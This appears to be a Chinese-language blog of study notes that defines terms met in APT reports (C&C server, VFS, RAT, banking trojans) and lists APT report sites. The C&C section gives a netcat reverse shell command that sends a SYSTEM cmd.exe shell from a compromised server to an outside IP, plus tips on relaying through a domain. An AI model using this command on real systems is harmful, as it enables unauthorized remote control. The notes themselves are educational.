浏览 APT 报告中学习积累
工具网站积累:(APT 报告搜寻网站)
https://ti.qianxin.com/
https://feed.watcherlab.com/index/apt
https://malpedia.caad.fkie.fraunhofer.de/
专业词积累
C&C 服务器
参考链接: https://cloud.tencent.com/developer/article/1180887
通常我们在做渗透测试的时候,在拿到一个 webshell 的时候,我们需要对服务器进行提权操作,如果是一台 windows 的服务器,提权的时候通常是利用本地提权漏洞的 exp 进行溢出提权,有些 exp 可以直接在后面加参数,溢出成功之后执行参数中的命令,而有的 exp 溢出成功之后是返回一个 system 权限的 cmd,这时就需要我们将系统权限的 cmd shell 反弹回本地。
这里我们使用 nc 在本地执行:
nc -vv -lp 3333
上述命令的意思是在本地监听一个 3333 端口等待连接,假设你的电脑 IP 是公网的,并且 IP 为 114.114.114.114。
然后在目标服务器就可以执行:
nc 114.114.114.114 3333 -e cmd.exe
上面的命令就可以把远程服务器的服务器权限的 cmd shell 返回到本地,这时你就可以通过 nc 建立的这个 shell 进行通信,发送你要执行的命令,在远程服务器接收到命令之后执行并将结果返回给你,这时你的本机电脑就是一个简易的 C&C 服务器。
如图简单的解释上面的过程:
如果你的本机电脑是在内网中,没有公网 IP,目标服务器也在内网,这时目标不能直接通过 IP 地址连接到你本机,此时我们则需要一台公网服务器做中转了。
再延伸一下,由于 IP 地址是随着中转服务器的变化而变化的,每次 IP 的 变化都会导致整个过程都要重新操作一次,每个命令语句都要进行修改,那么我们就可以将上面语句中的 IP 地址修改为我们注册的域名,然后将域名解析到我们的中转服务器,这样即使我们更换了中转服务器,我们也不需要更改执行过的命令。
虚拟文件系统:
参考链接:
https://baike.baidu.com/item/%E8%99%9A%E6%8B%9F%E6%96%87%E4%BB%B6%E7%B3%BB%E7%BB%9F/10986803?fr=aladdin
虚拟文件系统 (VFS) 是由 Sun microsystems 公司在定义网络文件系统 (NFS) 时创造的。它是一种用于网络环境的分布式文件系统,是允许和操作系统使用不同的文件系统实现的接口。虚拟文件系统(VFS)是物理文件系统与服务之间的一个接口层,它对 Linux 的每个文件系统的所有细节进行抽象,使得不同的文件系统在 Linux 核心以及系统中运行的其他进程看来,都是相同的。严格说来,VFS 并不是一种实际的文件系统。它只存在于内存中,不存在于任何外存空间。VFS 在系统启动时建立,在系统关闭时消亡。
RAT 恶意软件
参考链接:
https://www.sysgeek.cn/what-rat-malware/
远程访问特洛伊木马(RAT,Remote Access Trojan)是一种恶意软件,能够让黑客监视和控制您的计算机、网络设备甚至整个网络。
银行木马
参考链接:
https://baike.baidu.com/item/%E9%93%B6%E8%A1%8C%E6%9C%A8%E9%A9%AC/15669586
恶意软件中最邪恶的一种,直接从你的银行账号中取走钱的银行木马。
第一代是在 2001 年之前的变种,作为普通后门,进驻用户 PC。接着黑客通过后门进入,并获得对用户信息的访问。
Stewart 记录的例子是 BackOrfice,第一次出现在 1998 年。
第二代银行木马针对性更强,预先打包,然后寻找所需信息、自动实施盗窃。
“bancos” 木马就是一个有许多变种的第二代的典型例子。据 Stewart 所言,变种数量和各种银行木马真正的名称都不容易确定,因为不同的反病毒公司对同样的病毒的命名是不一致的。
至于 Bancos,赛门铁克的数据库中就记载了 26 个不同名字的变种。
第三代银行木马事实上可以自动模拟用户行为。
Steward 说:第三代银行木马会偷走你的信息,然后从你的账户中取走钱。第三代银行木马是以 “Win32.Grams” 的出现开始的,时间是 2004 年。
本文内容由网友自发贡献,版权归原作者所有,本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容,请联系:hwhale#tublm.com(使用前将#替换为@)